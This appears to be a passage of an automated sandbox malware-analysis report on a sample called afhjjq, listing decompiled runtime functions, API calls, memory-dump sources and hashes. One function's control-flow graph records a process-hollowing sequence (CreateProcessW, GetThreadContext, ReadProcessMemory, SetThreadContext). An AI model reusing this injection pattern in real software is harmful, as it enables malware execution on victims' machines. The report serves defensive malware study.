												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E01324360(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E013231DA(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E01323941(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E013242A5(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106); // executed
												_t107 = E013241A8(_t120, _t125, _t131, _t133, __eflags); // executed
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E01324360(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E013231DA(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E013242D7(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E013231DA(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                            0x01321660
                            0x01321668
                            0x0132166c
                            0x01321671
                            0x01321673
                            0x01321676
                            0x0132167c
                            0x0132169f
                            0x00000000
                            0x01321683
                            0x01321683
                            0x01321685
                            0x013216a6
                            0x013216a9
                            0x013216ab
                            0x013216ba
                            0x013216ba
                            0x013216bd
                            0x013216c2
                            0x013216c7
                            0x013216c7
                            0x013216ca
                            0x013216cc
                            0x00000000
                            0x013216ce
                            0x013216ce
                            0x013216d3
                            0x013216d6
                            0x013216d9
                            0x00000000
                            0x00000000
                            0x013216db
                            0x013216de
                            0x013216e2
                            0x013216e9
                            0x013216ec
                            0x013216ee
                            0x013216f8
                            0x013216f0
                            0x013216f3
                            0x013216f3
                            0x013216ff
                            0x01321701
                            0x013217f1
                            0x00000000
                            0x01321707
                            0x01321707
                            0x01321707
                            0x0132170e
                            0x01321754
                            0x01321754
                            0x01321757
                            0x013217c2
                            0x013217c8
                            0x013217cb
                            0x01321856
                            0x00000000
                            0x0132185c
                            0x013217d1
                            0x013217d5
                            0x01321825
                            0x01321825
                            0x01321829
                            0x01321833
                            0x01321838
                            0x01321838
                            0x01321840
                            0x01321848
                            0x01321849
                            0x0132184a
                            0x0132184b
                            0x0132184c
                            0x01321697
                            0x01321697
                            0x00000000
                            0x0132169c
                            0x013217d7
                            0x013217da
                            0x013217dd
                            0x013217e2
                            0x013217e3
                            0x013217e3
                            0x013217e3
                            0x013217e6
                            0x00000000
                            0x013217e6
                            0x01321759
                            0x0132175d
                            0x0132177e
                            0x01321783
                            0x01321785
                            0x01321787
                            0x01321787
                            0x0132175f
                            0x01321766
                            0x01321768
                            0x01321775
                            0x01321775
                            0x01321775
                            0x01321778
                            0x0132176a
                            0x0132176c
                            0x0132176f
                            0x0132176f
                            0x0132177a
                            0x0132177a
                            0x01321789
                            0x0132178c
                            0x00000000
                            0x01321792
                            0x01321792
                            0x01321793
                            0x01321797
                            0x0132179c
                            0x0132179d
                            0x0132179e
                            0x013217a3
                            0x013217a6
                            0x013217a8
                            0x01321864
                            0x00000000
                            0x01321864
                            0x013217ae
                            0x013217b1
                            0x01321852
                            0x01321852
                            0x01321852
                            0x01321852
                            0x00000000
                            0x01321852
                            0x013217b7
                            0x013217ba
                            0x013217bc
                            0x00000000
                            0x013217bc
                            0x0132178c
                            0x01321710
                            0x01321713
                            0x01321715
                            0x00000000
                            0x00000000
                            0x01321717
                            0x00000000
                            0x00000000
                            0x0132171d
                            0x0132171f
                            0x01321721
                            0x01321723
                            0x01321723
                            0x01321725
                            0x01321728
                            0x013217f9
                            0x013217fb
                            0x013217ff
                            0x01321808
                            0x0132180d
                            0x0132180d
                            0x01321810
                            0x01321815
                            0x01321816
                            0x01321817
                            0x01321818
                            0x01321819
                            0x0132181f
                            0x00000000
                            0x0132172e
                            0x01321737
                            0x0132173c
                            0x0132173f
                            0x01321741
                            0x01321744
                            0x01321746
                            0x01321749
                            0x0132174c
                            0x0132174c
                            0x013217e9
                            0x013217e9
                            0x013217e9
                            0x00000000
                            0x01321707
                            0x01321701
                            0x013216cc
                            0x013216ad
                            0x013216b2
                            0x013216b2
                            0x013216b5
                            0x013216b8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013216b8
                            0x01321687
                            0x01321687
                            0x0132168c
                            0x0132168d
                            0x0132168e
                            0x0132168f
                            0x01321690
                            0x01321696
                            0x00000000
                            0x01321696

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: c2215165c55aaec1ce3bc15af05cc047e0c6a00bae43fdd925e0692e753908a1
                            • Instruction ID: e96bbc068a4b0a272071fa1099359a5fc9f98e34d0fb4b071410f6a255e94334
                            • Opcode Fuzzy Hash: c2215165c55aaec1ce3bc15af05cc047e0c6a00bae43fdd925e0692e753908a1
                            • Instruction Fuzzy Hash: 0D51F831A00229EFDB30BF6D8A4459EBFB9EF91338F188229E92556190D7719951CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B12B3A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 143 2b12b3a-2b12b55 call 2b1298f 146 2b12b58-2b12b5c 143->146 147 2b12b74-2b12b81 146->147 148 2b12b5e-2b12b72 146->148 149 2b12b84-2b12b88 147->149 148->146 150 2b12ba0-2b12bad 149->150 151 2b12b8a-2b12b9e 149->151 152 2b12bb0-2b12bb4 150->152 151->149 153 2b12bb6-2b12bca 152->153 154 2b12bcc-2b12caa call 2b129a3 * 8 152->154 153->152 171 2b12cc1 154->171 172 2b12cac-2b12cb6 154->172 174 2b12cc5-2b12ce1 171->174 172->171 173 2b12cb8-2b12cbf 172->173 173->174 176 2b12ce3-2b12ce5 174->176 177 2b12cea 174->177 178 2b13064-2b13067 176->178 179 2b12cf1-2b12d19 CreateProcessW 177->179 180 2b12d20-2b12d39 GetThreadContext 179->180 181 2b12d1b 179->181 183 2b12d40-2b12d5d ReadProcessMemory 180->183 184 2b12d3b 180->184 182 2b13018-2b1301c 181->182 187 2b13061-2b13063 182->187 188 2b1301e-2b13022 182->188 185 2b12d64-2b12d6d 183->185 186 2b12d5f 183->186 184->182 189 2b12d94-2b12db3 call 2b13c8a 185->189 190 2b12d6f-2b12d7e 185->190 186->182 187->178 191 2b13035-2b13039 188->191 192 2b13024-2b1302f 188->192 202 2b12db5 189->202 203 2b12dba-2b12ddb call 2b13da4 189->203 190->189 195 2b12d80-2b12d8d call 2b13bf5 190->195 193 2b13041-2b13045 191->193 194 2b1303b 191->194 192->191 198 2b13047 193->198 199 2b1304d-2b13051 193->199 194->193 195->189 209 2b12d8f 195->209 198->199 204 2b13053-2b13058 call 2b13bf5 199->204 205 2b1305d-2b1305f 199->205 202->182 211 2b12e20-2b12e40 call 2b13da4 203->211 212 2b12ddd-2b12de4 203->212 204->205 205->178 209->182 219 2b12e42 211->219 220 2b12e47-2b12e5c call 2b12a0a 211->220 213 2b12de6-2b12e12 call 2b13da4 212->213 214 2b12e1b 212->214 222 2b12e14 213->222 223 2b12e19 213->223 214->182 219->182 225 2b12e65-2b12e6f 220->225 222->182 223->211 226 2b12ea1-2b12ea5 225->226 227 2b12e71-2b12e9f call 2b12a0a 225->227 229 2b12f85-2b12fa1 call 2b13a43 226->229 230 2b12eab-2b12eb9 226->230 227->225 237 2b12fa3 229->237 238 2b12fa5-2b12fc6 SetThreadContext 229->238 230->229 233 2b12ebf-2b12ecd 230->233 233->229 236 2b12ed3-2b12ef3 233->236 239 2b12ef6-2b12efa 236->239 237->182 240 2b12fc8 238->240 241 2b12fca-2b12fd4 call 2b13b44 238->241 239->229 242 2b12f00-2b12f15 239->242 240->182 250 2b12fd6 241->250 251 2b12fd8-2b12fdc 241->251 244 2b12f27-2b12f2b 242->244 245 2b12f68-2b12f80 244->245 246 2b12f2d-2b12f39 244->246 245->239 248 2b12f66 246->248 249 2b12f3b-2b12f64 246->249 248->244 249->248 250->182 253 2b12fe4-2b12fe8 251->253 254 2b12fde 251->254 255 2b12ff0-2b12ff4 253->255 256 2b12fea 253->256 254->253 257 2b12ff6 255->257 258 2b12ffc-2b13000 255->258 256->255 257->258 259 2b13002-2b13007 call 2b13bf5 258->259 260 2b1300c-2b13012 258->260 259->260 260->179 260->182
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID: D
                            • API String ID: 0-2746444292
                            • Opcode ID: 334a5c2d189ad3abc6f52fa122c8db01a1a36913681fbc78ae2c7aca0212d8e4
                            • Instruction ID: 113ab9e37a9111916f893b8c0a9f5f3c8a31f63490c8e50934448eaddb627a9a
                            • Opcode Fuzzy Hash: 334a5c2d189ad3abc6f52fa122c8db01a1a36913681fbc78ae2c7aca0212d8e4
                            • Instruction Fuzzy Hash: 0B02D170E00219EFDB24DF98C985BADBBF5FF08305F6040A9E915BA291D7749A84DF10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01322C4C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 300 1322c4c-1322c60 301 1322c67-1322c6e 300->301 302 1322c72-1322c7b 301->302 303 1322c70-1322c71 301->303
                            C-Code - Quality: 100%
                            			E01322C4C(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1330264 = _t6;
				if(_t6 != 0) {
					 *0x1331cbc = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                            0x01322c61
                            0x01322c67
                            0x01322c6e
                            0x01322c75
                            0x01322c7b
                            0x01322c71
                            0x01322c71
                            0x01322c71

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 01322C61
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID: Thv
                            • API String ID: 10892065-1420341948
                            • Opcode ID: 4d89a5829cfba90ededb10c243ecd261b3e04712cbb8ce7d90705cdfae067506
                            • Instruction ID: 090cc1497820f47c811a181454f4c0d508010efb462e714d514cc333b3b04d4d
                            • Opcode Fuzzy Hash: 4d89a5829cfba90ededb10c243ecd261b3e04712cbb8ce7d90705cdfae067506
                            • Instruction Fuzzy Hash: C8D05E765947099ADB216EB5AC087273BDC9384395F00C43AF80DC6144E9B4C540CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132186A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 304 132186a-132187e call 1322a5c 307 1321880-1321883 304->307 308 13218b7 304->308 307->308 310 1321885-1321888 307->310 309 13218b9-13218be call 1322aa1 308->309 311 132188a-132188e 310->311 312 13218bf-13218da call 132332b call 1321660 310->312 314 1321890-132189c call 1324360 311->314 315 132189f-13218b4 call 13231da call 1323941 311->315 324 13218df-13218f4 call 13218f6 312->324 314->315 315->308 324->309
                            C-Code - Quality: 70%
                            			E0132186A(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;
				void* _t34;

				_t30 = __edi;
				_t29 = __edx;
				_push(0xc);
				_push(0x132d418);
				E01322A5C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E0132332B( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E01321660(__edx,  *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E013218F6();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E01324360(__edi,  *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
							_t34 = _t34 + 0xc;
						}
						 *((intOrPtr*)(E013231DA(_t41))) = 0x16;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E01323941(_t29, _t30, 0);
						goto L6;
					}
				}
				return E01322AA1(_t19);
			}







                            0x0132186a
                            0x0132186a
                            0x0132186a
                            0x0132186c
                            0x01321871
                            0x01321878
                            0x0132187e
                            0x013218b7
                            0x013218b7
                            0x01321885
                            0x01321888
                            0x013218c2
                            0x013218c8
                            0x013218da
                            0x013218e2
                            0x013218e5
                            0x013218ec
                            0x013218f1
                            0x0132188a
                            0x0132188a
                            0x0132188e
                            0x01321897
                            0x0132189c
                            0x0132189c
                            0x013218a4
                            0x013218aa
                            0x013218ab
                            0x013218ac
                            0x013218ad
                            0x013218ae
                            0x013218af
                            0x00000000
                            0x013218b4
                            0x01321888
                            0x013218be

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: __lock_file_memset
                            • String ID:
                            • API String ID: 26237723-0
                            • Opcode ID: 5eaf20c378e7fe892fb4ba95427a176efef7e25f7920ef86b53747a22fcb4caa
                            • Instruction ID: 2af45227eed5edb4438e39e35216454ea520485be8ab08fad039e629539767aa
                            • Opcode Fuzzy Hash: 5eaf20c378e7fe892fb4ba95427a176efef7e25f7920ef86b53747a22fcb4caa
                            • Instruction Fuzzy Hash: 65014871C0022AEBDF22BFA88D0089F3F31BF24768F008225F928551A0DB758662DFD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B13168 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 02B1310A: GetSystemInfo.KERNELBASE(?), ref: 02B13127
                            • VirtualAllocExNuma.KERNELBASE(00000000), ref: 02B131CD
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: AllocInfoNumaSystemVirtual
                            • String ID:
                            • API String ID: 449148690-0
                            • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                            • Instruction ID: f97c37d9629cb800a12ee9c44a5288f14f2ffa69a6790a0b156b9828f4d60d9a
                            • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                            • Instruction Fuzzy Hash: AFF090B0D5031DBBEF007BF48C09B6DBAB9DF41701F9049E0AF44B6188EBB446948E66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01321649 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 362 1321649-132165f call 1321585
                            C-Code - Quality: 25%
                            			E01321649(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E01321585(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}










                            0x0132164e
                            0x01321650
                            0x01321653
                            0x01321656
                            0x0132165f

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: __fsopen
                            • String ID:
                            • API String ID: 3646066109-0
                            • Opcode ID: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                            • Instruction ID: 32f4b7221d19f7ef7cccc9e9931c12cfe9d0171bd5ab38159ba4ec818a1325d2
                            • Opcode Fuzzy Hash: b5f1e3f8c0985568a2b975540194b91a49099896255c8aa19d8b1f82aed34cac
                            • Instruction Fuzzy Hash: E9C09B7244010C77CF112986EC01E453F1A97D0664F154050FB1C191609573D5619585
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132504D Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 365 132504d-132504f call 1324fdb 367 1325054-1325055 365->367
                            C-Code - Quality: 100%
                            			E0132504D() {
				void* _t1;

				_t1 = E01324FDB(0); // executed
				return _t1;
			}




                            0x0132504f
                            0x01325055

                            APIs
                            • __encode_pointer.LIBCMT ref: 0132504F
                              • Part of subcall function 01324FDB: TlsGetValue.KERNEL32(00000000,?,01325054,00000000,013260A6,013302A0,00000000,00000314,?,01323123,013302A0,Microsoft Visual C++ Runtime Library,00012010), ref: 01324FED
                              • Part of subcall function 01324FDB: TlsGetValue.KERNEL32(00000005,?,01325054,00000000,013260A6,013302A0,00000000,00000314,?,01323123,013302A0,Microsoft Visual C++ Runtime Library,00012010), ref: 01325004
                              • Part of subcall function 01324FDB: RtlEncodePointer.NTDLL(00000000,?,01325054,00000000,013260A6,013302A0,00000000,00000314,?,01323123,013302A0,Microsoft Visual C++ Runtime Library,00012010), ref: 01325042
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: Value$EncodePointer__encode_pointer
                            • String ID:
                            • API String ID: 2585649348-0
                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                            • Instruction ID: 78c1fb375e5c35cb987ad136fe676cd8c0ce8df1eb9ba6ee01c8bdd99c6c0f08
                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                            • Instruction Fuzzy Hash:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B1306A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 425 2b1306a-2b130b1 call 2b1298f call 2b129a3 * 2 VirtualAlloc 432 2b130b3-2b130b6 425->432 433 2b130b8-2b130c0 425->433 432->433 434 2b130c2-2b130cf 433->434 435 2b13105-2b13109 433->435 436 2b130d2-2b130d6 434->436 437 2b130d8-2b130ec 436->437 438 2b130ee-2b130ff 436->438 437->436 438->435
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 02B130A7
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                            • Instruction ID: d0d625c787dd10289690e87b7c21846a087c8abca8fed40a03c71129daa5cb1a
                            • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                            • Instruction Fuzzy Hash: 4B110670D00218AFDB00EBA8CC49BAEBBF5EB04304FA084E5E945F7290D3714A44CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 01325B55 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E01325B55(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x132f5d8; // 0xc4da7b5e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1330878 = _t6;
				 *0x1330874 = _t22;
				 *0x1330870 = _t25;
				 *0x133086c = _t21;
				 *0x1330868 = _t27;
				 *0x1330864 = _t26;
				 *0x1330890 = ss;
				 *0x1330884 = cs;
				 *0x1330860 = ds;
				 *0x133085c = es;
				 *0x1330858 = fs;
				 *0x1330854 = gs;
				asm("pushfd");
				_pop( *0x1330888);
				 *0x133087c =  *_t31;
				 *0x1330880 = _v0;
				 *0x133088c =  &_a4;
				 *0x13307c8 = 0x10001;
				_t11 =  *0x1330880; // 0x0
				 *0x133077c = _t11;
				 *0x1330770 = 0xc0000409;
				 *0x1330774 = 1;
				_t12 =  *0x132f5d8; // 0xc4da7b5e
				_v812 = _t12;
				_t13 =  *0x132f5dc; // 0x3b2584a1
				_v808 = _t13;
				 *0x13307c0 = IsDebuggerPresent();
				_push(1);
				E01327168(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x132ca38);
				if( *0x13307c0 == 0) {
					_push(1);
					E01327168(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b55
                            0x01325b5b
                            0x01325b5d
                            0x01325b5d
                            0x0132947b
                            0x01329480
                            0x01329486
                            0x0132948c
                            0x01329492
                            0x01329498
                            0x0132949e
                            0x013294a5
                            0x013294ac
                            0x013294b3
                            0x013294ba
                            0x013294c1
                            0x013294c8
                            0x013294c9
                            0x013294d2
                            0x013294da
                            0x013294e2
                            0x013294ed
                            0x013294f7
                            0x013294fc
                            0x01329501
                            0x0132950b
                            0x01329515
                            0x0132951a
                            0x01329520
                            0x01329525
                            0x01329531
                            0x01329536
                            0x01329538
                            0x01329540
                            0x0132954b
                            0x01329558
                            0x0132955a
                            0x0132955c
                            0x01329561
                            0x01329575

                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 0132952B
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01329540
                            • UnhandledExceptionFilter.KERNEL32(0132CA38), ref: 0132954B
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 01329567
                            • TerminateProcess.KERNEL32(00000000), ref: 0132956E
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
